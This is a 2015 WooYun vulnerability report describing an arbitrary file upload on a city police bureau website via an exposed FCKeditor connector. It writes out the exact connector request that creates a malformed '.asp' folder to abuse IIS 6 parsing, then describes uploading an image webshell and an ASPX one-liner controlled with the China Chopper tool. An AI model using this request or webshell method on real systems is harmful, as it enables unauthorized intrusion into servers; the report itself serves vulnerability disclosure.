当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136370

漏洞标题:某市敏感部门任意文件上传(已getshell)

相关厂商:公安部一所

漏洞作者: 7b丶

提交时间:2015-08-24 20:57

修复时间:2015-10-12 14:58

公开时间:2015-10-12 14:58

漏洞类型:文件上传导致任意代码执行

危害等级:低

自评Rank:1

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-24: 细节已通知厂商并且等待厂商处理中
2015-08-28: 厂商已经确认,细节仅向厂商公开
2015-09-07: 细节向核心白帽子及相关领域专家公开
2015-09-17: 细节向普通白帽子公开
2015-09-27: 细节向实习白帽子公开
2015-10-12: 细节向公众公开

简要描述:

朋友嫖娼被抓了,来到他们市公安局围观政策法规看看他什么时候能放出来,然后职业病犯了...

详细说明:

发现fck一枚

http://**.**.**.**/fckeditor//editor/filemanager/connectors/test.html


创建畸形文件夹

http://**.**.**.**/fckeditor//editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/1.asp&NewFolderName=x.asp


传了个图片马利用iis6.0解析拿下shell
发现有360主机卫士 不过应该是没有完整开启 用网页端菜刀传了个aspx一句话然后用菜刀成功连接
在网站根目录发现下列文件

F:\***wwwroot\20150819_web\7.asp


F:\***wwwroot\20150819_web\mb.html


F:\***wwwroot\20150819_web\key.txt


F:\***wwwroot\20150819_web\content.txt


目测是博彩生成页面的文件

漏洞证明:

我传的马麻烦删一下

http://**.**.**.**/vv.aspx


http://**.**.**.**/test.txt

修复方案:

fck不用就关了吧...

版权声明:转载请注明来源 7b丶@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-08-28 14:57

厂商回复:

验证确认所描述的问题,已通知其修复。

最新状态:

暂无